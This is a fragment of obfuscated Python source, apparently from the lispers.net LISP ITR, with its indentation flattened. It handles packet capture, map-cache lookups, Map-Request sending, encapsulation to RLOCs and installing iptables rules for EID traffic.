lisp . lprint ( ( "Capturing suppressed on interface {}, " + "MAC filters configured" ) . format ( Oo00OoOo ) )
if 24 - 24: i11iIiiIii - I1Ii111
continue
if 21 - 21: I11i
if 92 - 92: i11iIiiIii / I1Ii111 - iII111i % ooOoO0o * I1Ii111 + Oo0Ooo
if 11 - 11: OoooooooOO . I1Ii111
if 80 - 80: OoooooooOO - OOooOOo * Ii1I * I1ii11iIi11i / I1IiiI / OOooOOo
if 13 - 13: I1Ii111 * ooOoO0o + i11iIiiIii * I1Ii111 - ooOoO0o
if 23 - 23: iIii1I11I1II1 * i1IIi % OoooooooOO * IiII
if ( lisp . lisp_is_macos ( ) ) :
if ( Oo00OoOo not in [ "en0" , "lo0" ] ) : continue
if 9 - 9: IiII - II111iiii + O0 / iIii1I11I1II1 / i11iIiiIii
if 39 - 39: IiII * Oo0Ooo + iIii1I11I1II1 - IiII + OOooOOo
o0 = [ Oo00OoOo , i1I11IiI1iiII , i1iIIi1 ]
lisp . lprint ( "Capturing packets on {}interface {}" . format ( O0iII1 , Oo00OoOo ) )
threading . Thread ( target = iiiI1I1iIIIi1 , args = o0 ) . start ( )
if 17 - 17: iIii1I11I1II1 . OoooooooOO / I11i % II111iiii % i1IIi / i11iIiiIii
if ( ii1iIi1iIiI1i ) : return
if 58 - 58: Oo0Ooo . II111iiii + oO0o - i11iIiiIii / II111iiii / O0
if 85 - 85: OoOoOO00 + OOooOOo
if 10 - 10: IiII / OoO0O00 + OoOoOO00 / i1IIi
if 27 - 27: Ii1I
if 67 - 67: I1IiiI
OO00OO0O0 = "(udp src port 4342 and ip[28] == 0x28)"
for Oo00OoOo in IIII1i :
o0 = [ Oo00OoOo , OO00OO0O0 , i1iIIi1 ]
lisp . lprint ( "Capture RLOC-probe replies on RLOC interface {}" . format ( Oo00OoOo ) )
if 48 - 48: I1Ii111
threading . Thread ( target = iiiI1I1iIIIi1 , args = o0 ) . start ( )
if 72 - 72: iII111i * oO0o % Ii1I . OoooooooOO
return
if 99 - 99: iIii1I11I1II1 % ooOoO0o + ooOoO0o + iII111i - I1Ii111 / I1Ii111
if 7 - 7: I1IiiI + OoOoOO00 / IiII
if 79 - 79: OoO0O00 - iIii1I11I1II1 + Ii1I - I1Ii111
if 93 - 93: II111iiii . I1IiiI - Oo0Ooo + OoOoOO00
if 61 - 61: II111iiii
if 15 - 15: i11iIiiIii % I1IiiI * I11i / I1Ii111
if 90 - 90: iII111i
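# Appears to be the shutdown helper: it cancels the periodic Info-Request
# timer and closes the ITR's control, IPC and punt sockets.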
def i1i1i1I ( ) :
if 83 - 83: oO0o + OoooooooOO
if 22 - 22: Ii1I % iII111i * OoooooooOO - o0oOOo0O0Ooo / iIii1I11I1II1
if 86 - 86: OoooooooOO . iII111i % OoOoOO00 / I11i * iII111i / o0oOOo0O0Ooo
if 64 - 64: i11iIiiIii
if ( I11 ) : I11 . cancel ( )
if 38 - 38: IiII / I1IiiI - IiII . I11i
if 69 - 69: OoooooooOO + I1ii11iIi11i
if 97 - 97: OOooOOo - OoO0O00 / Ii1I . i11iIiiIii % oO0o * oO0o
if 1 - 1: I1IiiI % ooOoO0o
lisp . lisp_close_socket ( II1iII1i [ 0 ] , "" )
lisp . lisp_close_socket ( II1iII1i [ 1 ] , "" )
lisp . lisp_close_socket ( i111I , "" )
lisp . lisp_close_socket ( II1Ii1iI1i , "" )
lisp . lisp_close_socket ( oO0oIIII , "lisp-itr" )
lisp . lisp_close_socket ( Oo0oO0oo0oO00 , "lispers.net-itr" )
return
if 65 - 65: I1IiiI + OoOoOO00 / OOooOOo
if 83 - 83: o0oOOo0O0Ooo . iII111i - Oo0Ooo
if 65 - 65: iIii1I11I1II1 / ooOoO0o . IiII - II111iiii
if 72 - 72: iIii1I11I1II1 / IiII % iII111i % OOooOOo - I11i % OOooOOo
if 100 - 100: Oo0Ooo + i11iIiiIii
if 71 - 71: I11i / o0oOOo0O0Ooo / I1Ii111 % OOooOOo
if 51 - 51: IiII * O0 / II111iiii . Ii1I % OOooOOo / I1IiiI
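# Appears to be the ITR data-plane handler for captured packets: it hands
# RLOC-probe replies to the control plane, decodes the inner packet, applies
# the interface's instance-id, checks that the source is a configured
# (possibly dynamic) EID, natively forwards traffic destined to local
# EID-prefixes, looks up the map-cache (sending a rate-limited Map-Request on
# a miss or a stale entry), and finally encapsulates to the selected RLOC or
# replicates across an RLE for multicast.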
def ii1iii1I1I ( packet , device , input_interface , macs , my_sa ) :
global II1iII1i
global iiI1iIiI
global Ii1IIii11 , Oooo0000
global oO0oIIII
if 95 - 95: IiII
if 51 - 51: II111iiii + IiII . i1IIi . I1ii11iIi11i + OoOoOO00 * I1IiiI
if 72 - 72: oO0o + oO0o / II111iiii . OoooooooOO % Ii1I
if 49 - 49: oO0o . OoO0O00 - Oo0Ooo * OoooooooOO . Oo0Ooo
ii1Ii1IiIIi = packet
packet , o0OO0 , oOo00Oo0o0Oo , I1 = lisp . lisp_is_rloc_probe ( packet , 1 )
if ( ii1Ii1IiIIi != packet ) :
if ( o0OO0 == None ) : return
lisp . lisp_parse_packet ( II1iII1i , packet , o0OO0 , oOo00Oo0o0Oo , I1 )
return
if 26 - 26: ooOoO0o . OOooOOo - OOooOOo . OoO0O00
if 39 - 39: OoooooooOO + oO0o % OOooOOo / OOooOOo
packet = lisp . lisp_packet ( packet )
if ( packet . decode ( False , None , None ) == None ) : return
if 27 - 27: iII111i . I11i . iIii1I11I1II1 . iIii1I11I1II1
if 20 - 20: o0oOOo0O0Ooo / i1IIi
if 71 - 71: OoOoOO00 . i1IIi
if 94 - 94: OOooOOo . I1Ii111
if 84 - 84: O0 . I11i - II111iiii . ooOoO0o / II111iiii
if 47 - 47: OoooooooOO
if ( my_sa ) : input_interface = device
if 4 - 4: I1IiiI % I11i
if 10 - 10: IiII . OoooooooOO - OoO0O00 + IiII - O0
if 82 - 82: ooOoO0o + II111iiii
if 39 - 39: oO0o % iIii1I11I1II1 % O0 % OoooooooOO * I1ii11iIi11i + iII111i
oOo000 = packet . inner_source
OO00Oo = lisp . lisp_get_interface_instance_id ( input_interface , oOo000 )
packet . inner_dest . instance_id = OO00Oo
packet . inner_source . instance_id = OO00Oo
if 14 - 14: OoO0O00 . II111iiii . I11i / Ii1I % I1ii11iIi11i - ooOoO0o
if 67 - 67: I11i - OOooOOo . i1IIi
if 35 - 35: iII111i + ooOoO0o - oO0o . iII111i . IiII
if 87 - 87: OoOoOO00
if ( macs != "" ) : macs = ", MACs: " + macs + ","
packet . print_packet ( "Receive {}{}" . format ( device , macs ) , False )
if 25 - 25: i1IIi . OoO0O00 - OoOoOO00 / OoO0O00 % OoO0O00 * iIii1I11I1II1
if 50 - 50: OoO0O00 . i11iIiiIii - oO0o . oO0o
if 31 - 31: OOooOOo / Oo0Ooo * i1IIi . OoOoOO00
if 57 - 57: OOooOOo + iIii1I11I1II1 % i1IIi % I1IiiI
if ( device != input_interface and device != "lispers.net" ) :
lisp . dprint ( "Not our MAC address on interface {}, pcap interface {}" . format ( input_interface , device ) )
if 83 - 83: o0oOOo0O0Ooo / i11iIiiIii % iIii1I11I1II1 . I11i % oO0o . OoooooooOO
return
if 94 - 94: Ii1I + iIii1I11I1II1 % OoO0O00
if 93 - 93: Ii1I - OOooOOo + iIii1I11I1II1 * o0oOOo0O0Ooo + I1Ii111 . iII111i
IiI1iII1II111 = lisp . lisp_decent_push_configured
if ( IiI1iII1II111 ) :
IIiI11i1111Ii = packet . inner_dest . is_multicast_address ( )
o00O0O = packet . inner_source . is_local ( )
IiI1iII1II111 = ( o00O0O and IIiI11i1111Ii )
if 70 - 70: Oo0Ooo . OoOoOO00
if 58 - 58: I11i + II111iiii * iII111i * i11iIiiIii - iIii1I11I1II1
if ( IiI1iII1II111 == False ) :
if 68 - 68: OoooooooOO % II111iiii
if 26 - 26: II111iiii % i11iIiiIii % iIii1I11I1II1 % I11i * I11i * I1ii11iIi11i
if 24 - 24: II111iiii % I1Ii111 - ooOoO0o + I1IiiI * I1ii11iIi11i
if 2 - 2: Ii1I - IiII
Oo0ooOo0o = lisp . lisp_db_for_lookups . lookup_cache ( packet . inner_source , False )
if ( Oo0ooOo0o == None ) :
lisp . dprint ( "Packet received from non-EID source" )
return
if 83 - 83: oO0o % o0oOOo0O0Ooo % Ii1I - II111iiii * OOooOOo / OoooooooOO
if 18 - 18: OoO0O00 + iIii1I11I1II1 - II111iiii - I1IiiI
if 71 - 71: OoooooooOO
if 33 - 33: I1Ii111
if 62 - 62: I1ii11iIi11i + Ii1I + i1IIi / OoooooooOO
if ( Oo0ooOo0o . dynamic_eid_configured ( ) ) :
IIiiii = lisp . lisp_allow_dynamic_eid ( input_interface ,
packet . inner_source )
if ( IIiiii ) :
lisp . lisp_itr_discover_eid ( Oo0ooOo0o , packet . inner_source ,
input_interface , IIiiii , oO0oIIII )
else :
iI111i1I1II = lisp . green ( packet . inner_source . print_address ( ) , False )
lisp . dprint ( "Disallow dynamic-EID {} on interface {}" . format ( iI111i1I1II ,
input_interface ) )
return
if 96 - 96: I1Ii111 / Oo0Ooo * II111iiii - iII111i * Oo0Ooo
if 81 - 81: IiII . o0oOOo0O0Ooo / I1Ii111
if 17 - 17: i11iIiiIii - OOooOOo . IiII % iIii1I11I1II1 + I11i - ooOoO0o
if ( packet . inner_source . is_local ( ) and
packet . udp_dport == lisp . LISP_CTRL_PORT ) : return
if 78 - 78: I11i * OoOoOO00 . O0 / O0
if 80 - 80: i1IIi - Oo0Ooo / OoO0O00 - i11iIiiIii
if 68 - 68: oO0o - I1ii11iIi11i % O0 % I1Ii111
if 11 - 11: O0 / OoO0O00 % OOooOOo + o0oOOo0O0Ooo + iIii1I11I1II1
if 40 - 40: ooOoO0o - OOooOOo . Ii1I * Oo0Ooo % I1Ii111
OoO = False
if ( packet . inner_version == 4 ) :
OoO , packet . packet = lisp . lisp_ipv4_input ( packet . packet )
if ( packet . packet == None ) : return
packet . inner_ttl -= 1
elif ( packet . inner_version == 6 ) :
packet . packet = lisp . lisp_ipv6_input ( packet )
if ( packet . packet == None ) : return
packet . inner_ttl -= 1
else :
packet . packet = lisp . lisp_mac_input ( packet . packet )
if ( packet . packet == None ) : return
packet . encap_port = lisp . LISP_L2_DATA_PORT
if 54 - 54: I11i / I1IiiI * oO0o + OoooooooOO - iII111i / OoooooooOO
if 19 - 19: IiII * ooOoO0o * o0oOOo0O0Ooo + O0 / O0
if 73 - 73: iIii1I11I1II1 / iIii1I11I1II1 - oO0o
if 91 - 91: oO0o + I1IiiI
if 59 - 59: I1IiiI + i11iIiiIii + i1IIi / I11i
if 44 - 44: I11i . OoOoOO00 * I1IiiI + OoooooooOO - iII111i - IiII
if ( oo0O000OoO == False ) :
Oo0ooOo0o = lisp . lisp_db_for_lookups . lookup_cache ( packet . inner_dest , False )
if ( Oo0ooOo0o and Oo0ooOo0o . dynamic_eid_configured == False ) :
lisp . dprint ( ( "Packet destined to local EID-prefix {}, " + "natively forwarding" ) . format ( Oo0ooOo0o . print_eid_tuple ( ) ) )
if 15 - 15: IiII / O0 . o0oOOo0O0Ooo . i11iIiiIii
packet . send_packet ( Ii1IIii11 , packet . inner_dest )
return
if 59 - 59: I1Ii111 - o0oOOo0O0Ooo - ooOoO0o
if 48 - 48: i1IIi + I11i % OoOoOO00 / Oo0Ooo - o0oOOo0O0Ooo
if 67 - 67: oO0o % o0oOOo0O0Ooo . OoooooooOO + OOooOOo * I11i * OoOoOO00
if 36 - 36: O0 + Oo0Ooo
if 5 - 5: Oo0Ooo * OoOoOO00
if 46 - 46: ooOoO0o
I11iIiII = lisp . lisp_map_cache_lookup ( packet . inner_source , packet . inner_dest )
if ( I11iIiII ) : I11iIiII . add_recent_source ( packet . inner_source )
if 66 - 66: Oo0Ooo - o0oOOo0O0Ooo * IiII + OoOoOO00 + o0oOOo0O0Ooo - iIii1I11I1II1
if 17 - 17: oO0o
if 22 - 22: I11i + iIii1I11I1II1
if 24 - 24: OoOoOO00 % i1IIi + iII111i . i11iIiiIii . I1ii11iIi11i
if 17 - 17: I1ii11iIi11i . II111iiii . ooOoO0o / I1ii11iIi11i
if 57 - 57: I11i
if 67 - 67: OoO0O00 . ooOoO0o
oO00oOo0OOO = Oo0ooOo0o . secondary_iid if ( Oo0ooOo0o != None ) else None
if ( oO00oOo0OOO and I11iIiII and I11iIiII . action == lisp . LISP_NATIVE_FORWARD_ACTION ) :
ii1 = packet . inner_dest
ii1 . instance_id = oO00oOo0OOO
I11iIiII = lisp . lisp_map_cache_lookup ( packet . inner_source , ii1 )
if ( I11iIiII ) : I11iIiII . add_recent_source ( packet . inner_source )
if 51 - 51: O0 . oO0o + i11iIiiIii
if 79 - 79: OoOoOO00 . oO0o . IiII % Ii1I
if 65 - 65: i11iIiiIii + i1IIi - Ii1I % Oo0Ooo
if 59 - 59: OOooOOo % iIii1I11I1II1 . i1IIi + II111iiii * IiII
if 41 - 41: Ii1I % I1ii11iIi11i
if ( I11iIiII == None or lisp . lisp_mr_or_pubsub ( I11iIiII . action ) ) :
if ( lisp . lisp_rate_limit_map_request ( packet . inner_dest ) ) : return
if 12 - 12: OOooOOo
ooOo0O = ( I11iIiII and I11iIiII . action == lisp . LISP_SEND_PUBSUB_ACTION )
lisp . lisp_send_map_request ( II1iII1i , iiI1iIiI ,
packet . inner_source , packet . inner_dest , None , ooOo0O )
if 37 - 37: Ii1I % OoO0O00
if ( packet . is_trace ( ) ) :
lisp . lisp_trace_append ( packet , reason = "map-cache miss" )
if 79 - 79: I1ii11iIi11i + I1IiiI / I1IiiI
return
if 71 - 71: OOooOOo * OoO0O00 % OoooooooOO % OoO0O00 / I1IiiI
if 56 - 56: OoooooooOO % i11iIiiIii * iIii1I11I1II1 . OoO0O00 * O0
if 23 - 23: i11iIiiIii
if 39 - 39: o0oOOo0O0Ooo - I1ii11iIi11i % iII111i * OoO0O00 - OOooOOo / iII111i
if 29 - 29: I1ii11iIi11i
if 52 - 52: i11iIiiIii / i1IIi
if ( I11iIiII and I11iIiII . is_active ( ) and I11iIiII . has_ttl_elapsed ( ) ) :
if ( lisp . lisp_rate_limit_map_request ( packet . inner_dest ) == False ) :
lisp . lprint ( "Refresh map-cache entry {}" . format ( lisp . green ( I11iIiII . print_eid_tuple ( ) , False ) ) )
if 1 - 1: ooOoO0o
lisp . lisp_send_map_request ( II1iII1i , iiI1iIiI ,
packet . inner_source , packet . inner_dest , None )
if 78 - 78: I1ii11iIi11i + I11i - O0
if 10 - 10: I1Ii111 % I1IiiI
if 97 - 97: OoooooooOO - I1Ii111
if 58 - 58: iIii1I11I1II1 + O0
if 30 - 30: ooOoO0o % iII111i * OOooOOo - I1ii11iIi11i * Ii1I % ooOoO0o
if 46 - 46: i11iIiiIii - O0 . oO0o
if 100 - 100: I1IiiI / o0oOOo0O0Ooo * iII111i . O0 / OOooOOo
I11iIiII . last_refresh_time = time . time ( )
I11iIiII . stats . increment ( len ( packet . packet ) )
if 83 - 83: I1Ii111
if 48 - 48: II111iiii * OOooOOo * I1Ii111
if 50 - 50: IiII % i1IIi
if 21 - 21: OoooooooOO - iIii1I11I1II1
OO0OoOOO0 , O00ooOo , oOO0o00O , oOoO , IIII , iI1iiiIiii = I11iIiII . select_rloc ( packet , oO0oIIII )
if 24 - 24: iIii1I11I1II1 + iIii1I11I1II1 * iII111i
if 18 - 18: iII111i * I11i - Ii1I
if ( OO0OoOOO0 == None and IIII == None ) :
if ( oOoO == lisp . LISP_NATIVE_FORWARD_ACTION ) :
lisp . dprint ( "Natively forwarding" )
packet . send_packet ( Ii1IIii11 , packet . inner_dest )
if 31 - 31: Oo0Ooo - O0 % OoOoOO00 % oO0o
if ( packet . is_trace ( ) ) :
lisp . lisp_trace_append ( packet , reason = "not an EID" )
if 45 - 45: I1ii11iIi11i + II111iiii * i11iIiiIii
return
if 13 - 13: OoooooooOO * oO0o - Ii1I / OOooOOo + I11i + IiII
iii1III1i = "No reachable RLOCs found"
lisp . dprint ( iii1III1i )
if ( packet . is_trace ( ) ) : lisp . lisp_trace_append ( packet , reason = iii1III1i )
return
if 17 - 17: II111iiii / II111iiii
if ( OO0OoOOO0 and OO0OoOOO0 . is_null ( ) ) :
iii1III1i = "Drop action RLOC found"
lisp . dprint ( iii1III1i )
if 65 - 65: IiII + Oo0Ooo
if ( packet . is_trace ( ) ) : lisp . lisp_trace_append ( packet , reason = iii1III1i )
return
if 59 - 59: OoooooooOO + I11i . I1Ii111 - O0 % iIii1I11I1II1 / O0
if 88 - 88: Oo0Ooo . O0 % OoooooooOO / OOooOOo
if 89 - 89: II111iiii / oO0o
if 14 - 14: OOooOOo . I1IiiI * ooOoO0o + II111iiii - ooOoO0o + OOooOOo
if 18 - 18: oO0o - o0oOOo0O0Ooo - I1IiiI - I1IiiI
packet . outer_tos = packet . inner_tos
packet . outer_ttl = 32 if ( OoO ) else packet . inner_ttl
if 54 - 54: Oo0Ooo + I1IiiI / iII111i . I1IiiI * OoOoOO00
if 1 - 1: OoOoOO00 * OoO0O00 . i1IIi / Oo0Ooo . I1ii11iIi11i + Oo0Ooo
if 17 - 17: Oo0Ooo + OoO0O00 / Ii1I / iII111i * OOooOOo
if 29 - 29: OoO0O00 % OoooooooOO * oO0o / II111iiii - oO0o
if ( OO0OoOOO0 ) :
packet . outer_dest . copy_address ( OO0OoOOO0 )
iI = packet . outer_dest . afi_to_version ( )
packet . outer_version = iI
i11ii = lisp . lisp_myrlocs [ 0 ] if ( iI == 4 ) else lisp . lisp_myrlocs [ 1 ]
if 50 - 50: Ii1I / OoOoOO00 * Ii1I
packet . outer_source . copy_address ( i11ii )
if 34 - 34: O0 * O0 % OoooooooOO + iII111i * iIii1I11I1II1 % Ii1I
if ( packet . is_trace ( ) ) :
if ( lisp . lisp_trace_append ( packet , rloc_entry = iI1iiiIiii ) == False ) : return
if 25 - 25: I11i + OoOoOO00 . o0oOOo0O0Ooo % OoOoOO00 * OOooOOo
if 32 - 32: i11iIiiIii - I1Ii111
if 53 - 53: OoooooooOO - IiII
if 87 - 87: oO0o . I1IiiI
if 17 - 17: Ii1I . i11iIiiIii
if 5 - 5: I1ii11iIi11i + O0 + O0 . I1Ii111 - ooOoO0o
if ( packet . encode ( oOO0o00O ) == None ) : return
if ( len ( packet . packet ) <= 1500 ) : packet . print_packet ( "Send" , True )
if 63 - 63: oO0o
if 71 - 71: i1IIi . Ii1I * iII111i % OoooooooOO + OOooOOo
if 36 - 36: IiII
if 49 - 49: OOooOOo / OoooooooOO / I1IiiI
o0OooooOoOO = Oooo0000 if iI == 6 else Ii1IIii11
packet . send_packet ( o0OooooOoOO , packet . outer_dest )
if 19 - 19: IiII
elif ( IIII ) :
if 78 - 78: OOooOOo % o0oOOo0O0Ooo
if 39 - 39: I1ii11iIi11i + I1IiiI - iIii1I11I1II1 - o0oOOo0O0Ooo
if 7 - 7: IiII . OoOoOO00 / I1ii11iIi11i . OOooOOo * I11i - II111iiii
if 37 - 37: I1Ii111 . OoOoOO00 / O0 * iII111i
if 7 - 7: OoO0O00 * I11i + II111iiii % i11iIiiIii
i1i1IiIiIi1Ii = IIII . rle_nodes [ 0 ] . level
oO0ooOO = len ( packet . packet )
for IIi1iI1 in IIII . rle_forwarding_list :
if ( IIi1iI1 . level != i1i1IiIiIi1Ii ) : return
if 44 - 44: I1ii11iIi11i - Ii1I / II111iiii * OoO0O00 * Oo0Ooo
packet . outer_dest . copy_address ( IIi1iI1 . address )
if ( IiI1iII1II111 ) : packet . inner_dest . instance_id = 0xffffff
iI = packet . outer_dest . afi_to_version ( )
packet . outer_version = iI
i11ii = lisp . lisp_myrlocs [ 0 ] if ( iI == 4 ) else lisp . lisp_myrlocs [ 1 ]
if 73 - 73: o0oOOo0O0Ooo - I1IiiI * i1IIi / i11iIiiIii * OOooOOo % II111iiii
packet . outer_source . copy_address ( i11ii )
if 56 - 56: OoooooooOO * Oo0Ooo . Oo0Ooo . I1ii11iIi11i
if ( packet . is_trace ( ) ) :
if ( lisp . lisp_trace_append ( packet ) == False ) : return
if 24 - 24: Oo0Ooo . I11i * Ii1I % iII111i / OOooOOo
if 58 - 58: I1IiiI - I1ii11iIi11i % O0 . I1IiiI % OoO0O00 % IiII
if ( packet . encode ( None ) == None ) : return
if 87 - 87: oO0o - i11iIiiIii
if 78 - 78: i11iIiiIii / iIii1I11I1II1 - o0oOOo0O0Ooo
if 23 - 23: I11i
if 40 - 40: o0oOOo0O0Ooo - II111iiii / Oo0Ooo
packet . print_packet ( "Replicate-to-L{}" . format ( IIi1iI1 . level ) , True )
packet . send_packet ( Ii1IIii11 , packet . outer_dest )
if 14 - 14: I1ii11iIi11i
if 5 - 5: o0oOOo0O0Ooo . iIii1I11I1II1 % iIii1I11I1II1
if 56 - 56: OoooooooOO - I11i - i1IIi
if 8 - 8: I1Ii111 / OOooOOo . I1IiiI + I1ii11iIi11i / i11iIiiIii
if 31 - 31: ooOoO0o - iIii1I11I1II1 + iII111i . Oo0Ooo / IiII % iIii1I11I1II1
I11i1iIiiIiIi = len ( packet . packet ) - oO0ooOO
packet . packet = packet . packet [ I11i1iIiiIiIi : : ]
if 49 - 49: OOooOOo . I1ii11iIi11i . i11iIiiIii - II111iiii / Ii1I
if 62 - 62: OOooOOo
if 1 - 1: IiII / IiII - i11iIiiIii
if 87 - 87: Oo0Ooo / O0 * IiII / o0oOOo0O0Ooo
if 19 - 19: I1Ii111 + i1IIi . I1IiiI - Oo0Ooo
if 16 - 16: oO0o + ooOoO0o / o0oOOo0O0Ooo
del ( packet )
return
if 82 - 82: IiII * i11iIiiIii % II111iiii - OoooooooOO
if 90 - 90: Oo0Ooo . oO0o * i1IIi - i1IIi
if 16 - 16: I1IiiI * i1IIi - o0oOOo0O0Ooo . IiII % I11i / o0oOOo0O0Ooo
if 14 - 14: iIii1I11I1II1 * I1Ii111 * I1ii11iIi11i / iIii1I11I1II1 * IiII / I11i
if 77 - 77: OoO0O00 + I1Ii111 + I1Ii111 * Ii1I / OoooooooOO . Ii1I
if 62 - 62: i1IIi - i1IIi
if 69 - 69: OoOoOO00 % oO0o - I11i
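# Appears to be the pcap callback: it determines the layer-2 header length
# (loopback, "lispers.net" tunnel, Ethernet, optional 802.1Q tag), optionally
# logs the frame, drops ARP, and passes the IP payload to the data-plane
# handler above.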
def Iiii1ii ( device , not_used , packet ) :
I1i111IiIiIi1 = 4 if device == "lo0" else 0 if device == "lispers.net" else 14
if 39 - 39: I11i - I1ii11iIi11i
if ( lisp . lisp_frame_logging ) :
OOO0o0OO0OO = lisp . bold ( "Received frame on interface '{}'" . format ( device ) ,
False )
oOo0O = lisp . lisp_format_packet ( packet [ 0 : 64 ] )
lisp . lprint ( "{}: {}" . format ( OOO0o0OO0OO , oOo0O ) )
if 43 - 43: o0oOOo0O0Ooo . iII111i . I11i + iIii1I11I1II1
if 78 - 78: iIii1I11I1II1 % OoOoOO00 + I1ii11iIi11i / i1IIi % II111iiii + OOooOOo
if 91 - 91: iIii1I11I1II1 % OoO0O00 . o0oOOo0O0Ooo + Ii1I + o0oOOo0O0Ooo
if 95 - 95: Ii1I + I1ii11iIi11i * OOooOOo
if 16 - 16: I11i / I1IiiI + OoO0O00 % iIii1I11I1II1 - i1IIi . oO0o
iIi1iIIIiIiI = ""
OooOo000o0o = False
OOo0oO00ooO00 = device
if ( I1i111IiIiIi1 == 14 ) :
iIiIIi1 , iI1I1iII1i , iiIIii , OooOo000o0o = lisp . lisp_get_input_interface ( packet )
OOo0oO00ooO00 = device if ( device in iIiIIi1 ) else iIiIIi1 [ 0 ]
iIi1iIIIiIiI = lisp . lisp_format_macs ( iI1I1iII1i , iiIIii )
if ( OOo0oO00ooO00 . find ( "vlan" ) != - 1 ) : I1i111IiIiIi1 += 4
if 70 - 70: o0oOOo0O0Ooo - OOooOOo
if 62 - 62: I11i
if 63 - 63: OOooOOo + ooOoO0o * oO0o / o0oOOo0O0Ooo / Oo0Ooo * iIii1I11I1II1
if 57 - 57: OoOoOO00 - oO0o / ooOoO0o % i11iIiiIii
if 3 - 3: iII111i . ooOoO0o % I1IiiI + I1ii11iIi11i
if 64 - 64: i1IIi
if ( int ( iiIIii [ 1 ] , 16 ) & 1 ) : OooOo000o0o = True
if 29 - 29: o0oOOo0O0Ooo / i11iIiiIii / I1IiiI % oO0o % i11iIiiIii
if 18 - 18: OOooOOo + I1Ii111
if 80 - 80: oO0o + o0oOOo0O0Ooo * Ii1I + OoO0O00
if 75 - 75: I11i / o0oOOo0O0Ooo / OOooOOo / IiII % ooOoO0o + II111iiii
if 4 - 4: iII111i - Oo0Ooo - IiII - I11i % i11iIiiIii / OoO0O00
if ( I1i111IiIiIi1 != 0 ) :
i1iii11 = struct . unpack ( "H" , packet [ I1i111IiIiIi1 - 2 : I1i111IiIiIi1 ] ) [ 0 ]
i1iii11 = socket . ntohs ( i1iii11 )
if ( i1iii11 == 0x8100 ) :
oO = struct . unpack ( "I" , packet [ I1i111IiIiIi1 : I1i111IiIiIi1 + 4 ] ) [ 0 ]
oO = socket . ntohl ( oO )
OOo0oO00ooO00 = "vlan" + str ( oO >> 16 )
I1i111IiIiIi1 += 4
elif ( i1iii11 == 0x806 ) :
lisp . dprint ( "Dropping ARP packets, host should have default route" )
return
if 51 - 51: I11i * o0oOOo0O0Ooo
if 78 - 78: IiII
if 83 - 83: iIii1I11I1II1 % OoOoOO00 % o0oOOo0O0Ooo % I1Ii111 . I1ii11iIi11i % O0
if ( lisp . lisp_l2_overlay ) : I1i111IiIiIi1 = 0
if 47 - 47: o0oOOo0O0Ooo
ii1iii1I1I ( packet [ I1i111IiIiIi1 : : ] , device , OOo0oO00ooO00 , iIi1iIIIiIiI , OooOo000o0o )
return
if 66 - 66: I1IiiI - IiII
if 33 - 33: I1IiiI / OoO0O00
if 12 - 12: II111iiii
if 2 - 2: i1IIi - I1IiiI + I11i . II111iiii
if 25 - 25: oO0o
if 34 - 34: OoOoOO00 . iIii1I11I1II1 % O0
if 43 - 43: I1ii11iIi11i - iII111i
if 70 - 70: iII111i / OOooOOo % ooOoO0o - Ii1I
if 47 - 47: iII111i
if 92 - 92: OOooOOo + OoOoOO00 % i1IIi
if 23 - 23: I1Ii111 - OOooOOo + Ii1I - OoOoOO00 * OoOoOO00 . Oo0Ooo
if 47 - 47: oO0o % iIii1I11I1II1
if 11 - 11: I1IiiI % Ii1I - OoO0O00 - oO0o + o0oOOo0O0Ooo
if 98 - 98: iII111i + Ii1I - OoO0O00
if 79 - 79: OOooOOo / I1Ii111 . OoOoOO00 - I1ii11iIi11i
if 47 - 47: OoooooooOO % O0 * iII111i . Ii1I
if 38 - 38: O0 - IiII % I1Ii111
if 64 - 64: iIii1I11I1II1
if 15 - 15: I1ii11iIi11i + OOooOOo / I1ii11iIi11i / I1Ii111
if 31 - 31: ooOoO0o + O0 + ooOoO0o . iIii1I11I1II1 + Oo0Ooo / o0oOOo0O0Ooo
if 6 - 6: Oo0Ooo % IiII * I11i / I1IiiI + Oo0Ooo
if 39 - 39: OoOoOO00 - Oo0Ooo / iII111i * OoooooooOO
if 100 - 100: O0 . I11i . OoO0O00 + O0 * oO0o
if 42 - 42: oO0o % OoooooooOO + o0oOOo0O0Ooo
if 56 - 56: OoooooooOO + I1ii11iIi11i - iII111i
if 24 - 24: o0oOOo0O0Ooo + ooOoO0o + I11i - iIii1I11I1II1
if 49 - 49: I11i . ooOoO0o * OoOoOO00 % IiII . O0
if 48 - 48: O0 * Ii1I - O0 / Ii1I + OoOoOO00
if 52 - 52: OoO0O00 % Ii1I * II111iiii
if 4 - 4: I11i % O0 - OoooooooOO + ooOoO0o . oO0o % II111iiii
if 9 - 9: II111iiii * II111iiii . i11iIiiIii * iIii1I11I1II1
if 18 - 18: OoO0O00 . II111iiii % OoOoOO00 % Ii1I
if 87 - 87: iIii1I11I1II1 . OoooooooOO * OoOoOO00
if 100 - 100: OoO0O00 / i1IIi - I1IiiI % Ii1I - iIii1I11I1II1
if 17 - 17: I11i / o0oOOo0O0Ooo % Oo0Ooo
if 71 - 71: IiII . I1Ii111 . OoO0O00
if 68 - 68: i11iIiiIii % oO0o * OoO0O00 * IiII * II111iiii + O0
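# Appears to install iptables/ip6tables rules into a "lisp" chain of the raw
# table so the kernel does not natively process packets sourced from EIDs:
# local, multicast, link-local and RLOC addresses are accepted, EID-to-EID
# traffic is accepted (unless acting as a PITR), and remaining EID-sourced
# traffic is dropped so only the pcap path handles it. The LISP_NO_IPTABLES
# and LISP_VIRTIO_BUG environment variables modify this behavior.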
def OO0oOOoo ( sources , dyn_eids ) :
if ( os . getenv ( "LISP_NO_IPTABLES" ) != None ) :
lisp . lprint ( "User selected to suppress installing iptables rules" )
return
if 66 - 66: I11i % I1ii11iIi11i % OoooooooOO
if 34 - 34: o0oOOo0O0Ooo / iII111i % O0 . OoO0O00 . i1IIi
os . system ( "sudo iptables -t raw -N lisp" )
os . system ( "sudo iptables -t raw -A PREROUTING -j lisp" )
os . system ( "sudo ip6tables -t raw -N lisp" )
os . system ( "sudo ip6tables -t raw -A PREROUTING -j lisp" )
if 29 - 29: O0 . I1Ii111
if 66 - 66: oO0o * iIii1I11I1II1 % iIii1I11I1II1 * IiII - ooOoO0o - IiII
if 70 - 70: I1Ii111 + oO0o
if 93 - 93: I1Ii111 + Ii1I
if 33 - 33: O0
if 78 - 78: O0 / II111iiii * OoO0O00
if 50 - 50: OoooooooOO - iIii1I11I1II1 + i1IIi % I1Ii111 - iIii1I11I1II1 % O0
if 58 - 58: IiII + iIii1I11I1II1
Oo00OO0OO = "sudo ip{}tables -t raw -A lisp -j ACCEPT -d {}"
OOo00OO0O0O = [ "127.0.0.1" , "::1" , "224.0.0.0/4 -p igmp" , "ff00::/8" ,
"fe80::/16" ]
